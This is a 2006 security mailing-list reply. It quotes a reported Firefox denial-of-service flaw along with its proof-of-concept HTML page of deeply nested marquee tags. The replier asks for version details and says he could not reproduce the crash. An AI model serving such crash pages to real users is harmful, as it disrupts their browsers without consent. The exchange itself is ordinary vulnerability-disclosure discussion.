Re: Fire fox dos exploit

[Josh Zlatin-Amishav <josh@xxxxxxxxxx>]

On Tue, 30 May 2006, co296@xxxxxxx wrote:

> I have found a problem which causes denial of service on fire fox browser

Can you give us some more details, like versions and platforms affected? I was unable to 
recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian unstable.

--
 - Josh

> Creadit:to n00b for finding this bug..
>
> the problem lie's in the
>
> <marquee> html tag uses 100% cpu and crash's the browser..
>
> Following proof of concept available
>
> <html>
> <head>
> <title>Credit to n00b..</title>
> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
> </head>
>
> <body>
> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
ue
> e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
> </body>
> </html>